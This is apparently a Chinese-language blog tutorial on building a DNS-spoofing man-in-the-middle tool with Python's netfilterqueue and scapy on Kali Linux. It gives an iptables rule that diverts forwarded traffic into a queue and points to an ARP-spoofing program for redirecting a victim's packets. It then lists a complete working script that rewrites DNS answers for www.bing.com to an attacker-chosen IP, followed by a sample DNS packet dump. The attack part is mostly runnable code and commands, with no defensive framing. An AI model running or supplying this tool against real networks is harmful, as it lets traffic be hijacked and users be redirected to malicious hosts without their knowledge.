利用Python的netfilterqueue第三方模块实现报文代理以及DNS欺骗程序
本文实现一个利用python的第三方模块netfilterqueue实现对报文拦截、修改的代理程序。NetfilterQueue 模块提供对Kali Linux 中被 iptables 规则匹配的数据包的访问。 如此匹配的数据包可以被接受(accept)、丢弃(drop)、更改、重新排序或给予标记。
首先利用iptables在kali Linux创建一个报文处理规则,以将收到的报文放入到queue中,否则报文来不及交给scapy处理就会被转发出去,然后利用scapy模块对queue中的t报文进行匹配以及修改,这里iptables用的chain是FORWARD,也就是说对从其他机器转发至(利用欺骗方法)Kali Linux的报文。
#iptables -I FORWARD -j NFQUEUE --queue-num 0 (这个queue-num号需要与后面对应上)
可以启动前面所编写的arpspoofy程序,将目标的报文通过ARP欺骗转发至Kali Linux进行处理,然后用下面的程序,对Queue中的报文进行处理,首先识别出DNS响应报文,然后对报文中的相应字段进行修改以实现对DNS的欺骗:
import netfilterqueue
from scapy.all import *
def packet_handler(pkt):
#Convert pkt to packet in the format of scapy to process and analyze
scapy_packet = IP(pkt.get_payload()) #需要将netfilterqueue所截获的报文转换成scapy形式的packet,以便进行分析和修改
if scapy_packet.haslayer(DNSRR): #只对返回的DNS响应报文进行修改
qname = scapy_packet[DNSQR].qname.decode('utf-8') #此处得到qname是二进制,需要UFT解码
print(qname)
if 'www.bing.com' in qname:
print("Spoofing the target!!!!!!!!!!!!!")
answer = DNSRR(rrname=qname, rdata='192.168.140.138' )
scapy_packet[DNS].an = answer
scapy_packet[DNS].ancount = 1
del scapy_packet[IP].len #由于修改了DNS响应报文,因此响应的IP报头以及UDP报文的字段需要做修改,简单的方法就是将相应的字段删除,scapy会自动进行计算
del scapy_packet[IP].chksum
del scapy_packet[UDP].len
del scapy_packet[UDP].chksum
# print(scapy_packet.show())
pkt.set_payload(bytes(scapy_packet))
pkt.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, packet_handler)
queue.run()DNS响应报文的内容如下所示,以作参考:
###[ IP ]### version = 4 ihl = 5 tos = 0x0 len = 284 id = 21095 flags = frag = 0 ttl = 127 proto = udp chksum = 0x8b25 src = 8.8.8.8 dst = 192.168.140.140 \options \ ###[ UDP ]### sport = domain dport = 60936 len = 264 chksum = 0x168f ###[ DNS ]### id = 40404 qr = 1 opcode = QUERY aa = 0 tc = 0 rd = 1 ra = 1 z = 0 ad = 0 cd = 0 rcode = ok qdcount = 1 ancount = 6 nscount = 0 arcount = 0 \qd \ |###[ DNS Question Record ]### | qname = 'api.onedrive.com.' | qtype = A | qclass = IN \an \ |###[ DNS Resource Record ]### | rrname = 'api.onedrive.com.' | type = CNAME | rclass = IN | ttl = 843 | rdlen = None | rdata = 'common-afdrk.fe.1drv.com.' |###[ DNS Resource Record ]### | rrname = 'common-afdrk.fe.1drv.com.' | type = CNAME | rclass = IN | ttl = 33 | rdlen = None | rdata = 'odc-commonafdrk-geo.onedrive.akadns.net.' |###[ DNS Resource Record ]### | rrname = 'odc-commonafdrk-geo.onedrive.akadns.net.' | type = CNAME | rclass = IN | ttl = 14 | rdlen = None | rdata = 'odc-commonafdrk-brs.onedrive.akadns.net.' |###[ DNS Resource Record ]### | rrname = 'odc-commonafdrk-brs.onedrive.akadns.net.' | type = CNAME | rclass = IN | ttl = 14 | rdlen = None | rdata = 'common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net.' |###[ DNS Resource Record ]### | rrname = 'common.be.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net.' | type = CNAME | rclass = IN | ttl = 25 | rdlen = None | rdata = 'l-0003.l-msedge.net.' |###[ DNS Resource Record ]### | rrname = 'l-0003.l-msedge.net.' | type = A | rclass = IN | ttl = 25 | rdlen = None | rdata = 13.107.42.12 ns = None ar = None
STRIVE FOR PROGRESS,NOT FOR PERFECTION
